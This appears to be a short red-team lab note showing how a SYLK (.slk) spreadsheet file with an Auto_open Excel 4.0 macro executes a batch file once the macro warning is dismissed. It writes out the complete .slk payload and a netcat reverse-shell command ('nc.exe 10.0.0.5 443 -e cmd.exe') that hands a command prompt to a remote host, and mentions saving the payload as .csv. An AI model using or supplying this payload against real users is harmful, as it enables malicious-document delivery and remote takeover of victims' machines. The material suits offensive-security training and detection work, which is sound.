This lab is based on findings by @StanHacked - see below references for more info.
Create an new text file, put the the below code and save it as .slk file:
{% code title="demo.slk" %}
ID;P
O;E
NN;NAuto_open;ER101C1;KOut Flank;F
C;X1;Y101;K0;EEXEC("c:\shell.cmd")
C;X1;Y102;K0;EHALT()
E
{% endcode %}
Note that the shell.cmd refers to a simple nc reverse shell batch file:
{% code title="c:\shell.cmd" %}
C:\tools\nc.exe 10.0.0.5 443 -e cmd.exe
{% endcode %}
Once the macro warning is dismissed, the reverse shell pops as expected:
Since the file is actually a plain text file, detecting/triaging malicious intents are made easier.
Note that the payload file could be saved as a .csv - note the additional warning though:
{% embed url="https://www.youtube.com/watch?v=xY2DIRfqNvA" %}
{% embed url="https://twitter.com/StanHacked/status/1049047727403937795" %}